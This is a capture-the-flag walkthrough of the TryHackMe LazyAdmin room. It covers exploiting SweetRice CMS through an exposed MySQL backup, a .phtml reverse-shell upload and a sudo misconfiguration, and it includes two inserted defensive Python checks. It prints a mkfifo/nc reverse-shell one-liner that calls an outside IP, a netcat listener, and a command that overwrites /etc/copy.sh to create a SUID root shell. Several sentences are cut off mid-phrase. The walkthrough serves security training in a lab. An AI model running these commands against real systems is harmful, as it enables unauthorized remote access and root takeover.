Challenge Link: https://tryhackme.com/room/lazyadmin
As usual, I started the initial enumeration with an nmap port scan, using service-version detection and the default scripts to look for open ports.
┌──(madhav㉿kali)-[~/ctf/thm/lazyAdmin]
└─$ nmap -sC -sV -oN nmap/initial 10.10.93.93
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-02 15:50 IST
Nmap scan report for 10.10.93.93
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.70 seconds
Only two ports are open: SSH on port 22 and an Apache web server on port 80. Let's start the enumeration with port 80.
The website shows only the default Apache 2 page. Next I ran a dirb scan to look for hidden files and directories.
┌──(madhav㉿kali)-[~/ctf/thm/lazyAdmin]
└─$ dirb http://10.10.93.93

-----------------
DIRB v2.22
By The Dark Raver
-----------------

URL_BASE: http://10.10.93.93/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.93.93/ ----
==> DIRECTORY: http://10.10.93.93/content/
+ http://10.10.93.93/index.html (CODE:200|SIZE:11321)
+ http://10.10.93.93/server-status (CODE:403|SIZE:276)

---- Entering directory: http://10.10.93.93/content/ ----
==> DIRECTORY: http://10.10.93.93/content/_themes/
==> DIRECTORY: http://10.10.93.93/content/as/
==> DIRECTORY: http://10.10.93.93/content/attachment/
==> DIRECTORY: http://10.10.93.93/content/images/
==> DIRECTORY: http://10.10.93.93/content/inc/
+ http://10.10.93.93/content/index.php (CODE:200|SIZE:2197)
==> DIRECTORY: http://10.10.93.93/content/js/
We have a directory named /content. When we visit the directory, we see a landing page which says that the website is still under construction.
We also see a line in the footer of the web page that says "powered by Basic-CMS.ORG Sweet Rice". This is probably the name of the CMS.
There is also a directory named /as where we can log in to the CMS, but it needs a valid username and password. I tried guessing some common usernames and passwords, but none of them worked.
Next I searched for 'basiccms.org sweet rice', but instead of the website or its documentation, the top results were a few Exploit-DB links XD. I looked through all the exploits, and the one I found interesting was an information disclosure exploit.
According to the exploit, we can simply visit the /inc/mysql_backup/ directory to get a MySQL backup.
I downloaded the backup file and opened it in a text editor. Inside the backup file, I found the password hash for the user manager.
We can crack this hash using hydra or some online password cracking website such as crackstation.net.
This was a very easy password. Now we can log in to SweetRice CMS through the /as directory we found earlier, using the credentials we've just recovered.
After logging in, I found an option named Media Center where we can upload our own files. We can upload a PHP shell here and execute it to get a reverse shell back to our system.
But we cannot simply upload our reverse shell there because the upload functionality does not accept
But we can upload the reverse shell by using some other extensions such as .phtml. Once the upload is complete we can run it from the
┌──(madhav㉿kali)-[~/ctf/thm/lazyAdmin]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connection received from (UNKNOWN) [10.10.93.93] 37266
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 15:03:30 up  2:50,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@THM-Chal:/$
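The upload step above worked because the media filter rejected the reverse shell's original extension but let .phtml through. As an added defender-side example (not code from the write-up or from SweetRice), here is how an upload check should be built instead: an allowlist of media extensions as the primary gate, with every dotted segment of the name inspected. The allowlist and the executable-extension set are assumptions for the example.

```python
import os
import re

# Allowlist of media types a CMS media library actually needs. This list is
# constructed for the example; the page does not show SweetRice's real filter.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "txt"}

# Extensions a typical Apache/PHP setup will execute. On the page a filter that
# rejected the obvious PHP extension still accepted .phtml, which is why this set
# is only a secondary check here and the allowlist above is the primary gate.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}

# Conservative file-name character set; a leading dot is refused, so names
# such as .htaccess can never be planted in the upload directory.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def validate_upload(filename: str) -> tuple[bool, str]:
    """Return (accepted, reason) for a client-supplied upload file name."""
    # Drop any directory component the client sent (../, C:\, and so on).
    name = os.path.basename(filename.replace("\\", "/"))
    if not SAFE_NAME.match(name):
        return False, "name contains disallowed characters"
    parts = name.lower().split(".")
    if len(parts) < 2:
        return False, "no extension"
    exts = parts[1:]
    # Check every dotted segment, not just the last, so shell.php.png is refused too.
    if any(e in EXECUTABLE_EXTENSIONS for e in exts):
        return False, "executable extension in name"
    if exts[-1] not in ALLOWED_EXTENSIONS:
        return False, f"extension .{exts[-1]} is not on the allowlist"
    return True, "ok"
```

Pair this with a web-server rule that refuses to hand the upload directory to the PHP handler at all, so a filter mistake cannot become code execution.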
Next I upgraded the dumb shell into a fully interactive TTY using the following commands:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo && fg
reset
export TERM=xterm
stty rows 48 columns 179
Next I checked the /home directory and there was a user named itguy. Inside the home directory of user itguy we can read our user flag.
www-data@THM-Chal:/$ ls -lah /home
total 12K
drwxr-xr-x  3 root  root  4.0K Nov 29  2019 .
drwxr-xr-x 23 root  root  4.0K Nov 29  2019 ..
drwxr-xr-x 18 itguy itguy 4.0K Nov 30  2019 itguy
www-data@THM-Chal:/$ cd home/itguy/
www-data@THM-Chal:/home/itguy$ wc -c user.txt
38 user.txt
Next I ran the sudo -l command to check whether we can run any command as root, and found that user www-data can run a Perl script present in the home directory of user itguy as root.
www-data@THM-Chal:/home/itguy$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
Next, when I checked the contents of /home/itguy/backup.pl, I found that it was executing another file.
www-data@THM-Chal:/home/itguy$ cat backup.pl
#!/usr/bin/perl
system("sh", "/etc/copy.sh");
Now I checked the contents of /etc/copy.sh and found a reverse shell one-liner inside it XD.
www-data@THM-Chal:/home/itguy$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
Next, I checked the permissions of this file and found that we have write permission on it. So instead of getting a reverse shell, I copied /bin/bash to the /tmp directory and set the SUID bit on the copy to get a root shell.
www-data@THM-Chal:/home/itguy$ ls -l /etc/copy.sh
-rw-r--rwx 1 root root 81 Nov 29  2019 /etc/copy.sh
www-data@THM-Chal:/home/itguy$ echo "cp /bin/bash /tmp/bash;chmod +s /tmp/bash" > /etc/copy.sh
Now if we execute backup.pl, it will create a binary named bash in the /tmp directory. Then we can execute that binary to get the root shell.
www-data@THM-Chal:/home/itguy$ sudo /usr/bin/perl /home/itguy/backup.pl
www-data@THM-Chal:/home/itguy$ cd /tmp
www-data@THM-Chal:/tmp$ ./bash -p
bash-4.3# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
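The root cause of this privilege escalation is a NOPASSWD sudo rule whose target script hands control to a world-writable file. As an added example from the defender's side (not code from the write-up), the audit below parses sudo -l output, follows absolute paths quoted inside the wrapper script, and reports any file in that chain that 'other' can write. The demo rebuilds the backup.pl -> copy.sh chain in a temporary directory with the -rw-r--rwx mode shown above; the regexes and the temp-dir layout are assumptions for the example.

```python
import os, re, stat, tempfile

# Matches a "sudo -l" rule such as: (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
NOPASSWD_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s+NOPASSWD:\s+(?P<cmd>.+)$")
# Absolute paths quoted inside the wrapper script, e.g. system("sh", "/etc/copy.sh")
QUOTED_PATH_RE = re.compile(r'"(/[^"]+)"')

def nopasswd_commands(sudo_l_output: str) -> list:
    """Return (runas, argv) for every NOPASSWD rule in sudo -l output."""
    return [(m.group("runas"), m.group("cmd").split())
            for m in map(NOPASSWD_RE.match, sudo_l_output.splitlines()) if m]

def world_writable(path: str) -> bool:
    """True for a regular file whose 'other' write bit is set (-rw-r--rwx on the page)."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_IWOTH)

def scripts_invoked_by(path: str) -> list:
    """Absolute paths referenced by an interpreter script (textual scan, not a parse)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return QUOTED_PATH_RE.findall(text) if text.startswith("#!") else []

def audit(sudo_l_output: str) -> list:
    """Findings as (rule, offending_path): a file root would run that 'other' can edit,
    either the script named in the rule or a script it hands to system()."""
    findings = []
    for _runas, argv in nopasswd_commands(sudo_l_output):
        for arg in (a for a in argv if a.startswith("/") and os.path.isfile(a)):
            for target in [arg] + scripts_invoked_by(arg):
                if world_writable(target):
                    findings.append((" ".join(argv), target))
    return findings

def demo() -> list:
    """Rebuild the page's backup.pl -> copy.sh chain in a temp dir (constructed files,
    not the real host) and audit it."""
    root = tempfile.mkdtemp()
    copy_sh, backup_pl = os.path.join(root, "copy.sh"), os.path.join(root, "backup.pl")
    with open(copy_sh, "w") as fh:
        fh.write("#!/bin/sh\necho backup placeholder\n")
    os.chmod(copy_sh, 0o647)  # -rw-r--rwx, the mode ls -l showed on the page
    with open(backup_pl, "w") as fh:
        fh.write(f'#!/usr/bin/perl\nsystem("sh", "{copy_sh}");\n')
    os.chmod(backup_pl, 0o644)
    sudo_l = f"User www-data may run the following commands on THM-Chal:\n    (ALL) NOPASSWD: /usr/bin/perl {backup_pl}\n"
    return audit(sudo_l)
```

The fix on a real host is the mirror image of the finding: every script reachable from a sudo rule must be root-owned and not group- or world-writable, and the rule itself should name a specific, non-writable path.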
Hurray! We're root now, and we can read our final flag present in the
bash-4.3# cd /root
bash-4.3# ls
root.txt
bash-4.3# wc -c root.txt
38 root.txt
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Alfrey Davilla.